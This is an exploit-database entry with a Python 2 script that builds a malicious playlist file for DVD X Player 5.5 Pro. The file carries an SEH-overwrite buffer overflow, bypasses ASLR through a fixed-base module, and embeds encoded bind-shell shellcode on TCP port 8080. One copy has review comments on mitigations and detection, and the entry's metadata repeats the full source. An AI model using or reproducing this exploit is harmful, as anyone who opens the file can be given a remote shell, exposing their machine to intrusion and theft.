ID EXPLOITPACK:0C2030C09EAA8FE2630D0602FA60AE59
Type exploitpack
Reporter blake
Modified 2015-01-05T16:37:25
Description
DVD X Player 5.5 Pro
Bypass ASLR by using a module that is not ASLR-enabled
SEH Overwrite
An egghunter is not needed, as there are at least 2000 bytes available for shellcode
import sys
# Python 2 script (print statements, raw_input): writes a crafted playlist
# file "owned.plf" into the current working directory. Nothing is sent over
# the network by this script itself; the file is the only output.
print "===================================="
print "DVD X Player 5.5 Pro Buffer Overflow"
print " SEH Overwrite - Bypass ASLR "
print " Written by Blake "
print "===================================="
# size = 325 bytes
# ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f c
# NOTE(review): per the command line above the payload is a bind shell
# listening on TCP 8080; a new listener on that port from the player
# process is the observable artefact if this file is ever opened.
shellcode=(
"\xba\x16\x44\x8a\xd1\xdb\xd1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x4b\x31\x55\x14\x83\xc5\x04\x03\x55\x10\xf4\xb1\x76\x39\x71"
"\x39\x87\xba\xe1\xb3\x62\x8b\x33\xa7\xe7\xbe\x83\xa3\xaa\x32"
"\x68\xe1\x5e\xc0\x1c\x2e\x50\x61\xaa\x08\x5f\x72\x1b\x95\x33"
"\xb0\x3a\x69\x4e\xe5\x9c\x50\x81\xf8\xdd\x95\xfc\xf3\x8f\x4e"
"\x8a\xa6\x3f\xfa\xce\x7a\x3e\x2c\x45\xc2\x38\x49\x9a\xb7\xf2"
"\x50\xcb\x68\x89\x1b\xf3\x03\xd5\xbb\x02\xc7\x06\x87\x4d\x6c"
"\xfc\x73\x4c\xa4\xcd\x7c\x7e\x88\x81\x42\x4e\x05\xd8\x83\x69"
"\xf6\xaf\xff\x89\x8b\xb7\x3b\xf3\x57\x32\xde\x53\x13\xe4\x3a"
"\x65\xf0\x72\xc8\x69\xbd\xf1\x96\x6d\x40\xd6\xac\x8a\xc9\xd9"
"\x62\x1b\x89\xfd\xa6\x47\x49\x9c\xff\x2d\x3c\xa1\xe0\x8a\xe1"
"\x07\x6a\x38\xf5\x31\x31\x55\x3a\x0f\xca\xa5\x54\x18\xb9\x97"
"\xfb\xb2\x55\x94\x74\x1c\xa1\xdb\xae\xd8\x3d\x22\x51\x18\x17"
"\xe1\x05\x48\x0f\xc0\x25\x03\xcf\xed\xf3\x83\x9f\x41\xac\x63"
"\x70\x22\x1c\x0b\x9a\xad\x43\x2b\xa5\x67\xec\x9a\x81\xdb\x7b"
"\xde\x35\xc3\xeb\x57\xd3\x91\x1b\x31\x4b\x0e\xde\x66\x44\xa9"
"\x21\x4d\xf8\x62\xb6\xda\x16\xb4\xb9\xdb\x3c\x96\x16\x74\xd7"
"\x6d\x75\x41\xc6\x71\x50\xe2\x9f\xe6\x2e\x62\xed\x97\x2f\xaf"
"\x87\x57\xba\x4b\x0e\x0f\x52\x51\x77\x67\xfd\xaa\x52\xf3\x34"
"\x3e\x1d\x6c\x39\xae\x9d\x6c\x6f\xa4\x9d\x04\xd7\x9c\xcd\x31"
"\x18\x09\x62\xea\x8d\xb1\xd3\x5e\x05\xd9\xd9\xb9\x61\x46\x21"
"\xec\x73\xbb\xf4\xc9\xf1\xcd\x72\x3a\x3a")
# 32 byte egghunter
# NOTE(review): the header says an egghunter is not needed, yet one is
# still placed in the file below (between the two NOP runs); it looks like
# a leftover from an earlier layout — confirm before relying on the comment.
egghunter =(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
"\x54\x30\x30\x57" # egg - W00T
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
# overwrite EIP = 260 bytes
# overwrite SEH = 616 bytes - 0x61602adb pop edi; pop esi; ret [EPG.dll]
# Mitigation note: the whole technique depends on the SEH chain being
# overwritable and on EPG.dll loading at a fixed base. SafeSEH/SEHOP on the
# process and rebuilding that module with ASLR enabled (/DYNAMICBASE) each
# remove a precondition the offsets above rely on.
egg = "\x54\x30\x30\x57\x54\x30\x30\x57"
buffer = "\x41" * 608  # 608 bytes of 0x41 padding up to the SEH record
next_seh = "\xeb\x06\x90\x90" # jump forward 6 bytes
seh = "\xdb\x2a\x60\x61" # pop/pop/ret
nops = "\x90" * 20
print "[+] Creating malicious plf"
# File layout, in order: 608 x 0x41, next_seh, seh, 20 NOPs, egghunter,
# 20 NOPs, egg marker, shellcode. A .plf made almost entirely of a long run
# of 'A' bytes followed by binary data is the on-disk signature to look for.
try:
    # Opened in text mode ("w"), so the bytes are written as-is only where
    # the platform performs no newline translation — presumably fine here
    # because 0x0a/0x0d were excluded from the encoder's bad-char list.
    file = open("owned.plf","w")
    file.write(buffer + next_seh + seh + nops + egghunter + nops + egg + shellcode)
    file.close()
    print "[+] File created successfully"
    raw_input("[+] Press any key to exit")
except:
    # Bare except: also swallows KeyboardInterrupt/SystemExit and hides the
    # real error; the exit code is 0 even on failure.
    print "[X] Error creating file!"
    sys.exit(0)
{"lastseen": "2020-04-01T19:04:11", "references": [], "description": "\n# DVD X Player 5.5 Pro\n# Bypass ASLR by using non-aslr enabled module\n# SEH Overwrite\n# Egghunter is not needed as there is at least 2000 bytes for shellcode", "edition": 1, "reporter": "blake", "exploitpack": {"type": "clientside", "platform": "windows"}, "published": "2015-01-05T16:37:25", "title": "DVD-X-Player-5.5-Pro-SEH", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:11", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2020-04-01T19:04:11", "rev": 2}, "vulnersScore": -0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-01-05T16:37:25", "id": "EXPLOITPACK:0C2030C09EAA8FE2630D0602FA60AE59", "href": "", "viewCount": 1, "sourceData": "import sys\n \nprint \"====================================\"\nprint \"DVD X Player 5.5 Pro Buffer Overflow\"\nprint \" SEH Overwrite - Bypass ASLR \"\nprint \" Written by Blake \"\nprint \"====================================\"\n \n# size = 325 bytes\n# ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b '\\x00\\x0a\\x0d\\x1a' -f 
c\nshellcode=(\n\"\\xba\\x16\\x44\\x8a\\xd1\\xdb\\xd1\\xd9\\x74\\x24\\xf4\\x5d\\x29\\xc9\\xb1\"\n\"\\x4b\\x31\\x55\\x14\\x83\\xc5\\x04\\x03\\x55\\x10\\xf4\\xb1\\x76\\x39\\x71\"\n\"\\x39\\x87\\xba\\xe1\\xb3\\x62\\x8b\\x33\\xa7\\xe7\\xbe\\x83\\xa3\\xaa\\x32\"\n\"\\x68\\xe1\\x5e\\xc0\\x1c\\x2e\\x50\\x61\\xaa\\x08\\x5f\\x72\\x1b\\x95\\x33\"\n\"\\xb0\\x3a\\x69\\x4e\\xe5\\x9c\\x50\\x81\\xf8\\xdd\\x95\\xfc\\xf3\\x8f\\x4e\"\n\"\\x8a\\xa6\\x3f\\xfa\\xce\\x7a\\x3e\\x2c\\x45\\xc2\\x38\\x49\\x9a\\xb7\\xf2\"\n\"\\x50\\xcb\\x68\\x89\\x1b\\xf3\\x03\\xd5\\xbb\\x02\\xc7\\x06\\x87\\x4d\\x6c\"\n\"\\xfc\\x73\\x4c\\xa4\\xcd\\x7c\\x7e\\x88\\x81\\x42\\x4e\\x05\\xd8\\x83\\x69\"\n\"\\xf6\\xaf\\xff\\x89\\x8b\\xb7\\x3b\\xf3\\x57\\x32\\xde\\x53\\x13\\xe4\\x3a\"\n\"\\x65\\xf0\\x72\\xc8\\x69\\xbd\\xf1\\x96\\x6d\\x40\\xd6\\xac\\x8a\\xc9\\xd9\"\n\"\\x62\\x1b\\x89\\xfd\\xa6\\x47\\x49\\x9c\\xff\\x2d\\x3c\\xa1\\xe0\\x8a\\xe1\"\n\"\\x07\\x6a\\x38\\xf5\\x31\\x31\\x55\\x3a\\x0f\\xca\\xa5\\x54\\x18\\xb9\\x97\"\n\"\\xfb\\xb2\\x55\\x94\\x74\\x1c\\xa1\\xdb\\xae\\xd8\\x3d\\x22\\x51\\x18\\x17\"\n\"\\xe1\\x05\\x48\\x0f\\xc0\\x25\\x03\\xcf\\xed\\xf3\\x83\\x9f\\x41\\xac\\x63\"\n\"\\x70\\x22\\x1c\\x0b\\x9a\\xad\\x43\\x2b\\xa5\\x67\\xec\\x9a\\x81\\xdb\\x7b\"\n\"\\xde\\x35\\xc3\\xeb\\x57\\xd3\\x91\\x1b\\x31\\x4b\\x0e\\xde\\x66\\x44\\xa9\"\n\"\\x21\\x4d\\xf8\\x62\\xb6\\xda\\x16\\xb4\\xb9\\xdb\\x3c\\x96\\x16\\x74\\xd7\"\n\"\\x6d\\x75\\x41\\xc6\\x71\\x50\\xe2\\x9f\\xe6\\x2e\\x62\\xed\\x97\\x2f\\xaf\"\n\"\\x87\\x57\\xba\\x4b\\x0e\\x0f\\x52\\x51\\x77\\x67\\xfd\\xaa\\x52\\xf3\\x34\"\n\"\\x3e\\x1d\\x6c\\x39\\xae\\x9d\\x6c\\x6f\\xa4\\x9d\\x04\\xd7\\x9c\\xcd\\x31\"\n\"\\x18\\x09\\x62\\xea\\x8d\\xb1\\xd3\\x5e\\x05\\xd9\\xd9\\xb9\\x61\\x46\\x21\"\n\"\\xec\\x73\\xbb\\xf4\\xc9\\xf1\\xcd\\x72\\x3a\\x3a\")\n \n# 32 byte egghunter\negghunter =(\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\"\n\"\\x54\\x30\\x30\\x57\" # egg - 
W00T\n\"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\")\n \n \n# overwrite EIP = 260 bytes\n# overwrite SEH = 616 bytes - 0x61602adb pop edi; pop esi; ret [EPG.dll]\n \negg = \"\\x54\\x30\\x30\\x57\\x54\\x30\\x30\\x57\"\nbuffer = \"\\x41\" * 608\nnext_seh = \"\\xeb\\x06\\x90\\x90\" # jump forward 6 bytes\nseh = \"\\xdb\\x2a\\x60\\x61\" # pop/pop/ret\nnops = \"\\x90\" * 20\n \nprint \"[+] Creating malicious plf\"\ntry:\n file = open(\"owned.plf\",\"w\")\n file.write(buffer + next_seh + seh + nops + egghunter + nops + egg + shellcode)\n file.close()\n print \"[+] File created successfully\"\n raw_input(\"[+] Press any key to exit\")\nexcept:\n print \"[X] Error creating file!\"\n sys.exit(0)", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}
{}